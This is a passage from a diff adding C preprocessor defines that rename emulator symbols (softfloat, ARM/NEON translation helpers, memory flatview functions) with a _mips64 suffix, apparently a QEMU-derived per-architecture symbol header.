define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_mips64 +#define deposit32 deposit32_mips64 +#define deposit64 deposit64_mips64 +#define deregister_tm_clones deregister_tm_clones_mips64 +#define device_class_base_init device_class_base_init_mips64 +#define device_class_init device_class_init_mips64 +#define device_finalize device_finalize_mips64 +#define device_get_realized device_get_realized_mips64 +#define device_initfn device_initfn_mips64 +#define device_post_init device_post_init_mips64 +#define device_reset device_reset_mips64 +#define device_set_realized device_set_realized_mips64 +#define device_type_info device_type_info_mips64 +#define disas_arm_insn disas_arm_insn_mips64 +#define disas_coproc_insn disas_coproc_insn_mips64 +#define disas_dsp_insn disas_dsp_insn_mips64 +#define disas_iwmmxt_insn disas_iwmmxt_insn_mips64 +#define disas_neon_data_insn disas_neon_data_insn_mips64 +#define disas_neon_ls_insn disas_neon_ls_insn_mips64 +#define disas_thumb2_insn disas_thumb2_insn_mips64 +#define disas_thumb_insn disas_thumb_insn_mips64 +#define disas_vfp_insn disas_vfp_insn_mips64 +#define disas_vfp_v8_insn disas_vfp_v8_insn_mips64 +#define do_arm_semihosting do_arm_semihosting_mips64 +#define do_clz16 do_clz16_mips64 +#define do_clz8 do_clz8_mips64 +#define do_constant_folding do_constant_folding_mips64 +#define do_constant_folding_2 do_constant_folding_2_mips64 +#define do_constant_folding_cond do_constant_folding_cond_mips64 +#define do_constant_folding_cond2 do_constant_folding_cond2_mips64 +#define do_constant_folding_cond_32 do_constant_folding_cond_32_mips64 +#define do_constant_folding_cond_64 do_constant_folding_cond_64_mips64 +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_mips64 +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_mips64 +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_mips64 +#define do_ssat do_ssat_mips64 +#define do_usad do_usad_mips64 +#define do_usat do_usat_mips64 +#define do_v7m_exception_exit do_v7m_exception_exit_mips64 +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_mips64 +#define dummy_func dummy_func_mips64 +#define dummy_section dummy_section_mips64 +#define _DYNAMIC _DYNAMIC_mips64 +#define _edata _edata_mips64 +#define _end _end_mips64 +#define end_list end_list_mips64 +#define eq128 eq128_mips64 +#define ErrorClass_lookup ErrorClass_lookup_mips64 +#define error_copy error_copy_mips64 +#define error_exit error_exit_mips64 +#define error_get_class error_get_class_mips64 +#define error_get_pretty error_get_pretty_mips64 +#define error_setg_file_open error_setg_file_open_mips64 +#define estimateDiv128To64 estimateDiv128To64_mips64 +#define estimateSqrt32 estimateSqrt32_mips64 +#define excnames excnames_mips64 +#define excp_is_internal excp_is_internal_mips64 +#define extended_addresses_enabled extended_addresses_enabled_mips64 +#define extended_mpu_ap_bits extended_mpu_ap_bits_mips64 +#define extract32 extract32_mips64 +#define extract64 extract64_mips64 +#define extractFloat128Exp extractFloat128Exp_mips64 +#define extractFloat128Frac0 extractFloat128Frac0_mips64 +#define extractFloat128Frac1 extractFloat128Frac1_mips64 +#define extractFloat128Sign extractFloat128Sign_mips64 +#define extractFloat16Exp extractFloat16Exp_mips64 +#define extractFloat16Frac extractFloat16Frac_mips64 +#define extractFloat16Sign extractFloat16Sign_mips64 +#define extractFloat32Exp extractFloat32Exp_mips64 +#define extractFloat32Frac extractFloat32Frac_mips64 +#define extractFloat32Sign extractFloat32Sign_mips64 +#define extractFloat64Exp extractFloat64Exp_mips64 +#define extractFloat64Frac extractFloat64Frac_mips64 +#define extractFloat64Sign extractFloat64Sign_mips64 +#define extractFloatx80Exp extractFloatx80Exp_mips64 +#define extractFloatx80Frac extractFloatx80Frac_mips64 +#define extractFloatx80Sign extractFloatx80Sign_mips64 +#define fcse_write fcse_write_mips64 +#define find_better_copy find_better_copy_mips64 +#define find_default_machine find_default_machine_mips64 +#define find_desc_by_name find_desc_by_name_mips64 +#define find_first_bit find_first_bit_mips64 +#define find_paging_enabled_cpu find_paging_enabled_cpu_mips64 +#define find_ram_block find_ram_block_mips64 +#define find_ram_offset find_ram_offset_mips64 +#define find_string find_string_mips64 +#define find_type find_type_mips64 +#define _fini _fini_mips64 +#define flatrange_equal flatrange_equal_mips64 +#define flatview_destroy flatview_destroy_mips64 +#define flatview_init flatview_init_mips64 +#define flatview_insert flatview_insert_mips64 +#define flatview_lookup flatview_lookup_mips64 +#define flatview_ref flatview_ref_mips64 +#define flatview_simplify flatview_simplify_mips64 +#define flatview_unref flatview_unref_mips64 +#define float128_add float128_add_mips64 +#define float128_compare float128_compare_mips64 +#define float128_compare_internal float128_compare_internal_mips64 +#define float128_compare_quiet float128_compare_quiet_mips64 +#define float128_default_nan float128_default_nan_mips64 +#define float128_div float128_div_mips64 +#define float128_eq float128_eq_mips64 +#define float128_eq_quiet float128_eq_quiet_mips64 +#define float128_is_quiet_nan float128_is_quiet_nan_mips64 +#define float128_is_signaling_nan float128_is_signaling_nan_mips64 +#define float128_le float128_le_mips64 +#define float128_le_quiet float128_le_quiet_mips64 +#define float128_lt float128_lt_mips64 +#define float128_lt_quiet float128_lt_quiet_mips64 +#define float128_maybe_silence_nan float128_maybe_silence_nan_mips64 +#define float128_mul float128_mul_mips64 +#define float128_rem float128_rem_mips64 +#define float128_round_to_int float128_round_to_int_mips64 +#define float128_scalbn float128_scalbn_mips64 +#define float128_sqrt float128_sqrt_mips64 +#define float128_sub float128_sub_mips64 +#define float128ToCommonNaN float128ToCommonNaN_mips64 +#define float128_to_float32 float128_to_float32_mips64 +#define float128_to_float64 float128_to_float64_mips64 +#define float128_to_floatx80 float128_to_floatx80_mips64 +#define float128_to_int32 float128_to_int32_mips64 +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips64 +#define float128_to_int64 float128_to_int64_mips64 +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips64 +#define float128_unordered float128_unordered_mips64 +#define float128_unordered_quiet float128_unordered_quiet_mips64 +#define float16_default_nan float16_default_nan_mips64 +#define float16_is_quiet_nan float16_is_quiet_nan_mips64 +#define float16_is_signaling_nan float16_is_signaling_nan_mips64 +#define float16_maybe_silence_nan float16_maybe_silence_nan_mips64 +#define float16ToCommonNaN float16ToCommonNaN_mips64 +#define float16_to_float32 float16_to_float32_mips64 +#define float16_to_float64 float16_to_float64_mips64 +#define float32_abs float32_abs_mips64 +#define float32_add float32_add_mips64 +#define float32_chs float32_chs_mips64 +#define float32_compare float32_compare_mips64 +#define float32_compare_internal float32_compare_internal_mips64 +#define float32_compare_quiet float32_compare_quiet_mips64 +#define float32_default_nan float32_default_nan_mips64 +#define float32_div float32_div_mips64 +#define float32_eq float32_eq_mips64 +#define float32_eq_quiet float32_eq_quiet_mips64 +#define float32_exp2 float32_exp2_mips64 +#define float32_exp2_coefficients float32_exp2_coefficients_mips64 +#define float32_is_any_nan float32_is_any_nan_mips64 +#define float32_is_infinity float32_is_infinity_mips64 +#define float32_is_neg float32_is_neg_mips64 +#define float32_is_quiet_nan float32_is_quiet_nan_mips64 +#define float32_is_signaling_nan float32_is_signaling_nan_mips64 +#define float32_is_zero float32_is_zero_mips64 +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_mips64 +#define float32_le float32_le_mips64 +#define float32_le_quiet float32_le_quiet_mips64 +#define float32_log2 float32_log2_mips64 +#define float32_lt float32_lt_mips64 +#define float32_lt_quiet float32_lt_quiet_mips64 +#define float32_max float32_max_mips64 +#define float32_maxnum float32_maxnum_mips64 +#define float32_maxnummag float32_maxnummag_mips64 +#define float32_maybe_silence_nan float32_maybe_silence_nan_mips64 +#define float32_min float32_min_mips64 +#define float32_minmax float32_minmax_mips64 +#define float32_minnum float32_minnum_mips64 +#define float32_minnummag float32_minnummag_mips64 +#define float32_mul float32_mul_mips64 +#define float32_muladd float32_muladd_mips64 +#define float32_rem float32_rem_mips64 +#define float32_round_to_int float32_round_to_int_mips64 +#define float32_scalbn float32_scalbn_mips64 +#define float32_set_sign float32_set_sign_mips64 +#define float32_sqrt float32_sqrt_mips64 +#define float32_squash_input_denormal float32_squash_input_denormal_mips64 +#define float32_sub float32_sub_mips64 +#define float32ToCommonNaN float32ToCommonNaN_mips64 +#define float32_to_float128 float32_to_float128_mips64 +#define float32_to_float16 float32_to_float16_mips64 +#define float32_to_float64 float32_to_float64_mips64 +#define float32_to_floatx80 float32_to_floatx80_mips64 +#define float32_to_int16 float32_to_int16_mips64 +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips64 +#define float32_to_int32 float32_to_int32_mips64 +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips64 +#define float32_to_int64 float32_to_int64_mips64 +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips64 +#define float32_to_uint16 float32_to_uint16_mips64 +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips64 +#define float32_to_uint32 float32_to_uint32_mips64 +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips64 +#define float32_to_uint64 float32_to_uint64_mips64 +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips64 +#define float32_unordered float32_unordered_mips64 +#define float32_unordered_quiet float32_unordered_quiet_mips64 +#define float64_abs float64_abs_mips64 +#define float64_add float64_add_mips64 +#define float64_chs float64_chs_mips64 +#define float64_compare float64_compare_mips64 +#define float64_compare_internal float64_compare_internal_mips64 +#define float64_compare_quiet float64_compare_quiet_mips64 +#define float64_default_nan float64_default_nan_mips64 +#define float64_div float64_div_mips64 +#define float64_eq float64_eq_mips64 +#define float64_eq_quiet float64_eq_quiet_mips64 +#define float64_is_any_nan float64_is_any_nan_mips64 +#define float64_is_infinity float64_is_infinity_mips64 +#define float64_is_neg float64_is_neg_mips64 +#define float64_is_quiet_nan float64_is_quiet_nan_mips64 +#define float64_is_signaling_nan float64_is_signaling_nan_mips64 +#define float64_is_zero float64_is_zero_mips64 +#define float64_le float64_le_mips64 +#define float64_le_quiet float64_le_quiet_mips64 +#define float64_log2 float64_log2_mips64 +#define float64_lt float64_lt_mips64 +#define float64_lt_quiet float64_lt_quiet_mips64 +#define float64_max float64_max_mips64 +#define float64_maxnum float64_maxnum_mips64 +#define float64_maxnummag float64_maxnummag_mips64 +#define float64_maybe_silence_nan float64_maybe_silence_nan_mips64 +#define float64_min float64_min_mips64 +#define float64_minmax float64_minmax_mips64 +#define float64_minnum float64_minnum_mips64 +#define float64_minnummag float64_minnummag_mips64 +#define float64_mul float64_mul_mips64 +#define float64_muladd float64_muladd_mips64 +#define float64_rem float64_rem_mips64 +#define float64_round_to_int float64_round_to_int_mips64 +#define float64_scalbn float64_scalbn_mips64 +#define float64_set_sign float64_set_sign_mips64 +#define float64_sqrt float64_sqrt_mips64 +#define float64_squash_input_denormal float64_squash_input_denormal_mips64 +#define float64_sub float64_sub_mips64 +#define float64ToCommonNaN float64ToCommonNaN_mips64 +#define float64_to_float128 float64_to_float128_mips64 +#define float64_to_float16 float64_to_float16_mips64 +#define float64_to_float32 float64_to_float32_mips64 +#define float64_to_floatx80 float64_to_floatx80_mips64 +#define float64_to_int16 float64_to_int16_mips64 +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips64 +#define float64_to_int32 float64_to_int32_mips64 +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips64 +#define float64_to_int64 float64_to_int64_mips64 +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips64 +#define float64_to_uint16 float64_to_uint16_mips64 +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips64 +#define float64_to_uint32 float64_to_uint32_mips64 +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips64 +#define float64_to_uint64 float64_to_uint64_mips64 +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips64 +#define float64_trunc_to_int float64_trunc_to_int_mips64 +#define float64_unordered float64_unordered_mips64 +#define float64_unordered_quiet float64_unordered_quiet_mips64 +#define float_raise float_raise_mips64 +#define floatx80_add floatx80_add_mips64 +#define floatx80_compare floatx80_compare_mips64 +#define floatx80_compare_internal floatx80_compare_internal_mips64 +#define floatx80_compare_quiet floatx80_compare_quiet_mips64 +#define floatx80_default_nan floatx80_default_nan_mips64 +#define floatx80_div floatx80_div_mips64 +#define floatx80_eq floatx80_eq_mips64 +#define floatx80_eq_quiet floatx80_eq_quiet_mips64 +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips64 +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips64 +#define floatx80_le floatx80_le_mips64 +#define floatx80_le_quiet floatx80_le_quiet_mips64 +#define floatx80_lt floatx80_lt_mips64 +#define floatx80_lt_quiet floatx80_lt_quiet_mips64 +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_mips64 +#define floatx80_mul floatx80_mul_mips64 +#define floatx80_rem floatx80_rem_mips64 +#define floatx80_round_to_int floatx80_round_to_int_mips64 +#define floatx80_scalbn floatx80_scalbn_mips64 +#define floatx80_sqrt floatx80_sqrt_mips64 +#define floatx80_sub floatx80_sub_mips64 +#define floatx80ToCommonNaN floatx80ToCommonNaN_mips64 +#define floatx80_to_float128 floatx80_to_float128_mips64 +#define floatx80_to_float32 floatx80_to_float32_mips64 +#define floatx80_to_float64 floatx80_to_float64_mips64 +#define floatx80_to_int32 floatx80_to_int32_mips64 +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips64 +#define floatx80_to_int64 floatx80_to_int64_mips64 +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips64 +#define floatx80_unordered floatx80_unordered_mips64 +#define floatx80_unordered_quiet floatx80_unordered_quiet_mips64 +#define flush_icache_range flush_icache_range_mips64 +#define format_string format_string_mips64 +#define fp_decode_rm fp_decode_rm_mips64 +#define frame_dummy frame_dummy_mips64 +#define free_range free_range_mips64 +#define fstat64 fstat64_mips64 +#define futex_wait futex_wait_mips64 +#define futex_wake futex_wake_mips64 +#define gen_aa32_ld16s gen_aa32_ld16s_mips64 +#define gen_aa32_ld16u gen_aa32_ld16u_mips64 +#define gen_aa32_ld32u gen_aa32_ld32u_mips64 +#define gen_aa32_ld64 gen_aa32_ld64_mips64 +#define gen_aa32_ld8s gen_aa32_ld8s_mips64 +#define gen_aa32_ld8u gen_aa32_ld8u_mips64 +#define gen_aa32_st16 gen_aa32_st16_mips64 +#define gen_aa32_st32 gen_aa32_st32_mips64 +#define gen_aa32_st64 gen_aa32_st64_mips64 +#define gen_aa32_st8 gen_aa32_st8_mips64 +#define gen_adc gen_adc_mips64 +#define gen_adc_CC gen_adc_CC_mips64 +#define gen_add16 gen_add16_mips64 +#define gen_add_carry gen_add_carry_mips64 +#define gen_add_CC gen_add_CC_mips64 +#define gen_add_datah_offset gen_add_datah_offset_mips64 +#define gen_add_data_offset gen_add_data_offset_mips64 +#define gen_addq gen_addq_mips64 +#define gen_addq_lo gen_addq_lo_mips64 +#define gen_addq_msw gen_addq_msw_mips64 +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_mips64 +#define gen_arm_shift_im gen_arm_shift_im_mips64 +#define gen_arm_shift_reg gen_arm_shift_reg_mips64 +#define gen_bx gen_bx_mips64 +#define gen_bx_im gen_bx_im_mips64 +#define gen_clrex gen_clrex_mips64 +#define generate_memory_topology generate_memory_topology_mips64 +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_mips64 +#define gen_exception gen_exception_mips64 +#define gen_exception_insn gen_exception_insn_mips64 +#define gen_exception_internal gen_exception_internal_mips64 +#define gen_exception_internal_insn gen_exception_internal_insn_mips64 +#define gen_exception_return gen_exception_return_mips64 +#define gen_goto_tb gen_goto_tb_mips64 +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_mips64 +#define gen_helper_add_saturate gen_helper_add_saturate_mips64 +#define gen_helper_add_setq gen_helper_add_setq_mips64 +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_mips64 +#define gen_helper_clz32 gen_helper_clz32_mips64 +#define gen_helper_clz64 gen_helper_clz64_mips64 +#define gen_helper_clz_arm gen_helper_clz_arm_mips64 +#define gen_helper_cpsr_read gen_helper_cpsr_read_mips64 +#define gen_helper_cpsr_write gen_helper_cpsr_write_mips64 +#define gen_helper_crc32_arm gen_helper_crc32_arm_mips64 +#define gen_helper_crc32c gen_helper_crc32c_mips64 +#define gen_helper_crypto_aese gen_helper_crypto_aese_mips64 +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_mips64 +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_mips64 +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_mips64 +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_mips64 +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_mips64 +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_mips64 +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_mips64 +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_mips64 +#define gen_helper_double_saturate gen_helper_double_saturate_mips64 +#define gen_helper_exception_internal gen_helper_exception_internal_mips64 +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_mips64 +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_mips64 +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_mips64 +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_mips64 +#define gen_helper_get_user_reg gen_helper_get_user_reg_mips64 +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_mips64 +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_mips64 +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_mips64 +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_mips64 +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_mips64 +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_mips64 +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_mips64 +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_mips64 +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_mips64 +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_mips64 +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_mips64 +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_mips64 +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_mips64 +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_mips64 +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_mips64 +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_mips64 +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_mips64 +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_mips64 +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_mips64 +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_mips64 +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_mips64 +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_mips64 +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_mips64 +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_mips64 +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_mips64 +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_mips64 +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_mips64 +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_mips64 +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_mips64 +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_mips64 +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_mips64 +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_mips64 +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_mips64 +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_mips64 +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_mips64 +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_mips64 +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_mips64 +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_mips64 +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_mips64 +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_mips64 +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_mips64 +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_mips64 +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_mips64 +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_mips64 +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_mips64 +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_mips64 +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_mips64 +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_mips64 +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_mips64 +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_mips64 +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_mips64 +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_mips64 +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_mips64 +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_mips64 +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_mips64 +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_mips64 +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_mips64 +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_mips64 +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_mips64 +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_mips64 +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_mips64 +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_mips64 +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_mips64 +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_mips64 +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_mips64 +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_mips64 +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_mips64 +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_mips64 +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_mips64 +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_mips64 +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_mips64 +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_mips64 +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_mips64 +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_mips64 +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_mips64 +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_mips64 +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_mips64 +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_mips64 +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_mips64 +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_mips64 +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_mips64 +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_mips64 +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_mips64 +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_mips64 +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_mips64 +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_mips64 +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_mips64 +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_mips64 +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_mips64 +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_mips64 +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_mips64 +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_mips64 +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_mips64 +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_mips64 +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_mips64 +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_mips64 +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_mips64 +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_mips64 +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_mips64 +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_mips64 +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_mips64 +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_mips64 +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_mips64 +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_mips64 +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_mips64 +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_mips64 +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_mips64 +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_mips64 +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_mips64 +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_mips64 +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_mips64 +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_mips64 +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_mips64 +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_mips64 +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_mips64 +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_mips64 +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_mips64 +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_mips64 +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_mips64 +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_mips64 +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_mips64 +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_mips64 +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_mips64 +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_mips64 +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_mips64 +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_mips64 +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_mips64 +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_mips64 +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_mips64 +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_mips64 +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_mips64 +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_mips64 +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_mips64 +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_mips64 +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_mips64 +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_mips64 +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_mips64 +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_mips64 +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_mips64 +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_mips64 +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_mips64 +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_mips64 +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_mips64 +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_mips64 +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_mips64 +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_mips64 +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_mips64 +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_mips64 +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_mips64 +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_mips64 +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_mips64 +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_mips64 +#define gen_helper_neon_fcvt_f16_to_f32 